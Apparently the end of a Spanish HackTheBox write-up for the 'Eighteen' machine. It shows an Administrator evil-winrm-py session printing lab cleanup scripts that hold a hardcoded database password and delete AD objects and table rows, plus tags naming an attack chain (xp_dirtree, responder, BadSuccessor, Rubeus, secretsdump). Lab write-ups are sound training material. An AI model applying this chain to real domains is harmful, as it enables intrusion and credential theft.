<p>Localmente existen dos scripts que son utilizados para mantener la maquina en su estado inicial.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span><span class="lnt">71 </span><span class="lnt">72 </span><span class="lnt">73 </span><span class="lnt">74 </span><span class="lnt">75 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">evil-winrm-py PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>ocuments&gt; dir </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Directory: C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>ocuments </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Mode LastWriteTime Length Name </span></span><span class="line"><span class="cl">---- ------------- ------ ---- </span></span><span class="line"><span class="cl">-a---- 10/29/2025 5:40 AM <span class="m">1226</span> clean_OU.ps1 </span></span><span class="line"><span class="cl">-a---- 11/8/2025 7:18 AM <span class="m">421</span> warmup_flask.ps1 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">evil-winrm-py PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>ocuments&gt; cat clean_OU.ps1 </span></span><span class="line"><span class="cl"><span class="c1"># Clean OU</span> </span></span><span class="line"><span class="cl">Import-Module ActiveDirectory </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">$ou</span> <span class="o">=</span> <span class="s2">&#34;OU=Staff,DC=eighteen,DC=htb&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Get-ADObject -SearchBase <span class="nv">$ou</span> -Filter <span class="s1">&#39;ObjectClass -eq &#34;msDS-DelegatedManagedServiceAccount&#34;&#39;</span> <span class="p">|</span> ForEach-Object <span class="o">{</span> </span></span><span class="line"><span class="cl"> Remove-ADObject -Identity <span class="nv">$_</span>.DistinguishedName -Confirm:<span class="nv">$false</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># Clean financial_planner database</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">$server</span> <span class="o">=</span> <span class="s2">&#34;127.0.0.1&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">$database</span> <span class="o">=</span> <span class="s2">&#34;financial_planner&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">$username</span> <span class="o">=</span> <span class="s2">&#34;appdev&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">$password</span> <span class="o">=</span> <span class="s1">&#39;MissThisElite$90&#39;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">$connectionString</span> <span class="o">=</span> <span class="s2">&#34;Server=</span><span class="nv">$server</span><span class="s2">;Database=</span><span class="nv">$database</span><span class="s2">;User ID=</span><span class="nv">$username</span><span class="s2">;Password=</span><span class="nv">$password</span><span class="s2">;TrustServerCertificate=True;&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">$queries</span> <span class="o">=</span> @<span class="o">(</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;DELETE FROM users WHERE id &gt; 1002;&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;DELETE FROM incomes;&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;DELETE FROM expenses;&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;DELETE FROM allocations;&#34;</span> </span></span><span class="line"><span class="cl"><span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">$connection</span> <span class="o">=</span> New-Object System.Data.SqlClient.SqlConnection </span></span><span class="line"><span class="cl"><span class="nv">$connection</span>.ConnectionString <span class="o">=</span> <span class="nv">$connectionString</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">try <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="nv">$connection</span>.Open<span class="o">()</span> </span></span><span class="line"><span class="cl"> foreach <span class="o">(</span><span class="nv">$query</span> in <span class="nv">$queries</span><span class="o">)</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="nv">$command</span> <span class="o">=</span> <span class="nv">$connection</span>.CreateCommand<span class="o">()</span> </span></span><span class="line"><span class="cl"> <span class="nv">$command</span>.CommandText <span class="o">=</span> <span class="nv">$query</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="nv">$rowsAffected</span> <span class="o">=</span> <span class="nv">$command</span>.ExecuteNonQuery<span class="o">()</span> </span></span><span class="line"><span class="cl"> Write-Output <span class="s2">&#34;Executed: </span><span class="nv">$query</span><span class="s2">&#34;</span> </span></span><span class="line"><span class="cl"> Write-Output <span class="s2">&#34;Rows affected: </span><span class="nv">$rowsAffected</span><span class="s2">`n&#34;</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span><span class="line"><span class="cl">catch <span class="o">{</span> </span></span><span class="line"><span class="cl"> Write-Error <span class="s2">&#34;Error: </span><span class="k">$(</span><span class="nv">$_</span>.Exception.Message<span class="k">)</span><span class="s2">&#34;</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span><span class="line"><span class="cl">finally <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="nv">$connection</span>.Close<span class="o">()</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span><span class="line"><span class="cl">evil-winrm-py PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>ocuments&gt; cat warmup_flask.ps1 </span></span><span class="line"><span class="cl">Import-Module WebAdministration </span></span><span class="line"><span class="cl"><span class="nv">$siteName</span> <span class="o">=</span> <span class="s2">&#34;financial_planner&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">while</span> <span class="o">((</span><span class="nv">$site</span> <span class="o">=</span> Get-Website -Name <span class="nv">$siteName</span><span class="o">)</span> -and <span class="nv">$site</span>.state -ne <span class="s2">&#34;Started&#34;</span><span class="o">)</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> Start-Sleep -Seconds <span class="m">1</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Restart-WebItem <span class="s2">&#34;IIS:\Sites\$siteName&#34;</span> </span></span><span class="line"><span class="cl">Start-Sleep -Seconds <span class="m">2</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">try <span class="o">{</span> </span></span><span class="line"><span class="cl"> Invoke-WebRequest -Uri <span class="s2">&#34;http://eighteen.htb/&#34;</span> -UseBasicParsing -TimeoutSec <span class="m">10</span> <span class="p">|</span> Out-Null </span></span><span class="line"><span class="cl"><span class="o">}</span> catch <span class="o">{</span> </span></span><span class="line"><span class="cl"> Write-Warning <span class="s2">&#34;Could not reach the site for warmup: </span><span class="nv">$_</span><span class="s2">&#34;</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span><span class="line"><span class="cl">evil-winrm-py PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>ocuments&gt; </span></span></code></pre></td></tr></table> </div> </div> sckull featured image meta image mssql xp_dirtree responder enum_logins exec_as_login pbkdf2-hmac-sha256 hashcat metasploit password-spraying winrmexec tunneling evil-winrm-py ligolo-ng bloodyAD BadSuccessor BadSuccessor.ps1 Rubeus ticketConverter secretsdump hackthebox windows